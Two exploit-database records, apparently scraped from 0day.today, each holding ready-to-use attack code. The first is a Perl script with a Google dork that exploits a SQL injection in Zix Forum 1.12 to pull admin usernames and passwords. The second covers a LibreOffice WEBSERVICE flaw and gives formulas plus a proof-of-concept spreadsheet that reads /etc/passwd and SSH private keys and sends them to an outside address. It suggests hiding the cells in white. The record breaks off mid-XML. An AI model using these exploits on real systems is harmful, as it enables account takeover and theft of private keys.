{"hash": "c38ee98ff258efa47e33689113f6544d20276fd23978f2b8481fa270a0058ae4", "id": "1337DAY-ID-847", "lastseen": "2018-01-05T07:11:45", "viewCount": 4, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "6dd95153996a75bdbe64d5cf71efc3a4", "key": "href"}, {"hash": "5872f440161126687c06bf2a20d0efd2", "key": "modified"}, {"hash": "5872f440161126687c06bf2a20d0efd2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5f50653e2c486487bb2369bfb33ce8ac", "key": "reporter"}, {"hash": "886f50383e5d2bcde48cd980090ed073", "key": "sourceData"}, {"hash": "bc3f575b6daaa4757b38b11709cb60f5", "key": "sourceHref"}, {"hash": "edf4a9df90534cefe932e26a1e039aa7", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-29774", "1337DAY-ID-28948", "1337DAY-ID-26535", "1337DAY-ID-24363", "1337DAY-ID-5492"]}], "modified": "2018-01-05T07:11:45"}, "vulnersScore": 10.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/847", "description": "Exploit for unknown platform in category web applications", "title": "Zix Forum <= 1.12 (RepId) Remote SQL Injection Exploit", "history": [{"bulletin": {"hash": "4a4af07e1ca7b2d5aea1b868ed1f773e9eb304d6c933dcebe7eb11e3083bfffb", "id": "1337DAY-ID-847", "lastseen": "2016-04-20T00:46:01", "enchantments": {"score": {"value": 4.0, "modified": "2016-04-20T00:46:01"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "5872f440161126687c06bf2a20d0efd2", "key": "modified"}, {"hash": "2ba51318b02056da6cfb9b587baf1b68", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a71be82a9151ef5f7f922547f9d2db44", "key": "href"}, {"hash": "5f50653e2c486487bb2369bfb33ce8ac", "key": "reporter"}, {"hash": "1da3e388c9de171b3394785ba524f78f", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5872f440161126687c06bf2a20d0efd2", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "edf4a9df90534cefe932e26a1e039aa7", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/847", "description": "Exploit for unknown platform in category web applications", "viewCount": 1, "title": "Zix Forum <= 1.12 (RepId) Remote SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "======================================================\r\nZix Forum <= 1.12 (RepId) Remote SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n###########################################\r\n# ZIXForum <= v1.12 Exploit\r\n# Vulnerability found by Chironex Fleckeri\r\n# Created By: SlimTim10\r\n###########################################\r\n# Google dork:\r\n# intext:\"ZIXForum 1.12 by: ZixCom 2002\"\r\n###########################################\r\n\r\n\r\nuse IO::Socket::INET;\r\n\r\nusage() unless (@ARGV == 2);\r\n\r\n$host = shift(@ARGV);\r\n$dir = shift(@ARGV);\r\n\r\n$dir = \"\\/$dir\" if ($dir !~ /^\\//);\r\n$dir = \"$dir\\/\" if ($dir !~ /\\/$/);\r\n$host =~ s/http:\\/\\///g;\r\n\r\n$path = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_user,null,null,null,null,null,null,null,null%20FROM%20adminlogins';\r\n$path2 = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_pass,null,null,null,null,null,null,null,null%20FROM%20adminlogins';\r\n$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"[-]Connect Failed: could not connect to $host\\r\\n\"; # show an error!\r\n\r\nprint \"[+]Connecting...\\n\";\r\nprint $socket \"GET $path HTTP/1.1\\n\";\r\nprint $socket \"Host: $host\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nprint \"[+]Connected\\n\";\r\nprint \"[+]User: \";\r\n\r\nwhile ($answer = <$socket>) {\r\n $answer =~ m/name=\"R_Headline\" size=\"30\" class=\"normal\" value=\"Re: (.*?)\"/ && print \"$1\\n\";\r\n}\r\n\r\n$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"[-]Connect Failed: could not connect to $host\\r\\n\";\r\nprint $socket \"GET $path2 HTTP/1.1\\n\";\r\nprint $socket \"Host: $host\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nprint \"[+]Pass: \";\r\n\r\nwhile ($answer = <$socket>) {\r\n $answer =~ m/name=\"R_Headline\" size=\"30\" class=\"normal\" value=\"Re: (.*?)\"/ && print \"$1\\n\";\r\n}\r\n\r\nsub usage {\r\n print \"\\n\" . \"=|=-\" x 14 . \"=|=\";\r\n print q(\r\n] [\r\n[ ZIXForum <= 1.12 \"RepId\" Remote SQL Injection Exploit ]\r\n] Tested on ZIXForum <= v1.12 [\r\n[ Created By: SlimTim10 <slimtim10@gmail.com> ]\r\n] [);\r\n print \"\\n\" . \"=|=-\" x 14 . \"=|=\\n\\n\";\r\n print \" Usage: $0\";\r\n print q( [HOST] [PATH] E.g. );\r\n print \"$0\";\r\n print q( www.host.com /forum/);\r\n print \"\\n\\n\" . \"`^\" x 29 . \"`\\n\";\r\n exit;\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-09-17T00:00:00", "references": [], "reporter": "SlimTim10", "modified": "2006-09-17T00:00:00", "href": "http://0day.today/exploit/description/847"}, "lastseen": "2016-04-20T00:46:01", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "======================================================\r\nZix Forum <= 1.12 (RepId) Remote SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n###########################################\r\n# ZIXForum <= v1.12 Exploit\r\n# Vulnerability found by Chironex Fleckeri\r\n# Created By: SlimTim10\r\n###########################################\r\n# Google dork:\r\n# intext:\"ZIXForum 1.12 by: ZixCom 2002\"\r\n###########################################\r\n\r\n\r\nuse IO::Socket::INET;\r\n\r\nusage() unless (@ARGV == 2);\r\n\r\n$host = shift(@ARGV);\r\n$dir = shift(@ARGV);\r\n\r\n$dir = \"\\/$dir\" if ($dir !~ /^\\//);\r\n$dir = \"$dir\\/\" if ($dir !~ /\\/$/);\r\n$host =~ s/http:\\/\\///g;\r\n\r\n$path = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_user,null,null,null,null,null,null,null,null%20FROM%20adminlogins';\r\n$path2 = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_pass,null,null,null,null,null,null,null,null%20FROM%20adminlogins';\r\n$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"[-]Connect Failed: could not connect to $host\\r\\n\"; # show an error!\r\n\r\nprint \"[+]Connecting...\\n\";\r\nprint $socket \"GET $path HTTP/1.1\\n\";\r\nprint $socket \"Host: $host\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nprint \"[+]Connected\\n\";\r\nprint \"[+]User: \";\r\n\r\nwhile ($answer = <$socket>) {\r\n $answer =~ m/name=\"R_Headline\" size=\"30\" class=\"normal\" value=\"Re: (.*?)\"/ && print \"$1\\n\";\r\n}\r\n\r\n$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"[-]Connect Failed: could not connect to $host\\r\\n\";\r\nprint $socket \"GET $path2 HTTP/1.1\\n\";\r\nprint $socket \"Host: $host\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nprint \"[+]Pass: \";\r\n\r\nwhile ($answer = <$socket>) {\r\n $answer =~ m/name=\"R_Headline\" size=\"30\" class=\"normal\" value=\"Re: (.*?)\"/ && print \"$1\\n\";\r\n}\r\n\r\nsub usage {\r\n print \"\\n\" . \"=|=-\" x 14 . \"=|=\";\r\n print q(\r\n] [\r\n[ ZIXForum <= 1.12 \"RepId\" Remote SQL Injection Exploit ]\r\n] Tested on ZIXForum <= v1.12 [\r\n[ Created By: SlimTim10 <[email\u00a0protected]> ]\r\n] [);\r\n print \"\\n\" . \"=|=-\" x 14 . \"=|=\\n\\n\";\r\n print \" Usage: $0\";\r\n print q( [HOST] [PATH] E.g. );\r\n print \"$0\";\r\n print q( www.host.com /forum/);\r\n print \"\\n\\n\" . \"`^\" x 29 . \"`\\n\";\r\n exit;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2006-09-17T00:00:00", "references": [], "reporter": "SlimTim10", "modified": "2006-09-17T00:00:00", "href": "https://0day.today/exploit/description/847"}

{"zdt": [{"lastseen": "2018-04-02T00:19:06", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2018-02-12T00:00:00", "published": "2018-02-12T00:00:00", "href": "https://0day.today/exploit/description/29774", "id": "1337DAY-ID-29774", "title": "LibreOffice < 6.0.1 - =WEBSERVICE Remote Arbitrary File Disclosure Vulnerability", "type": "zdt", "sourceData": "# Vulnerability description\r\n \r\n[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)\r\n \r\n## First part\r\n \r\nLibreOffice supports COM.MICROSOFT.WEBSERVICE function:\r\n \r\n https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4\r\n \r\nThe function is required to obtain data by URL, usually used as:\r\n \r\n =FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\")\r\n \r\nIn original:\r\n \r\n For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.\r\n \r\nIn LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.\r\n \r\n## Second part\r\n \r\nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.\r\n \r\n# Exploitation\r\n \r\nTo read file you need just:\r\n \r\n =WEBSERVICE(\"/etc/passwd\")\r\n \r\nThis function can also be used to send a file:\r\n \r\n =WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\"))\r\n \r\nFor successful operation, you need to send the files of the current user, so you need to retrieve current user home path.\r\n \r\n =MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\",\r\n \r\nAlso you can parse other files too, like a ~/.ssh/config or something like that.\r\n \r\nFor other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).\r\n \r\n# Impact\r\n \r\nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.\r\n \r\n# Acknowledgment\r\n \r\nVulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).\r\n \r\n - - -\r\n \r\n# poc.fods\r\n \r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n \r\n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\">\r\n <office:automatic-styles>\r\n <style:style style:name=\"co1\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co2\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co3\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co4\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co5\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co6\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/>\r\n </style:style>\r\n <style:style style:name=\"ro1\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ro2\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/>\r\n </style:style>\r\n <style:style style:name=\"ro3\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"135.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\">\r\n <style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/>\r\n </style:style>\r\n <style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/>\r\n <style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:text-properties style:use-window-font-color=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:table-cell-properties fo:background-color=\"#f3715a\"/>\r\n </style:style>\r\n <style:page-layout style:name=\"pm1\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/>\r\n </style:footer-style>\r\n </style:page-layout>\r\n <style:page-layout style:name=\"pm2\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:footer-style>\r\n </style:page-layout>\r\n </office:automatic-styles>\r\n <office:body>\r\n <office:spreadsheet>\r\n <table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/>\r\n <table:table table:name=\"Sheet1\" table:style-name=\"ta1\">\r\n <table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"8\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell table:number-columns-repeated=\"9\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro2\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Current user:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\">\r\n <text:p>689</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\">\r\n <text:p>676</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>http://localhost:8080</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro3\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>List of private keys:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\"/>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Send:</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>0 (default path)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"5\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\">\r\n <text:p>1</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" calcext:value-type=\"float\">\r\n <text:p>132</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\">\r\n <text:p>109</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\">\r\n <text:p>96</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\">\r\n <text:p>2</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\">\r\n <text:p>297</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\">\r\n <text:p>259</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\">\r\n <text:p>246</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\">\r\n <text:p>3</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\">\r\n <text:p>436</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\">\r\n <text:p>409</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\">\r\n <text:p>396</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"4\" calcext:value-type=\"float\">\r\n <text:p>4</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\">\r\n <text:p>586</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\">\r\n <text:p>563</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\">\r\n <text:p>550</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\">\r\n <text:p>5</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" 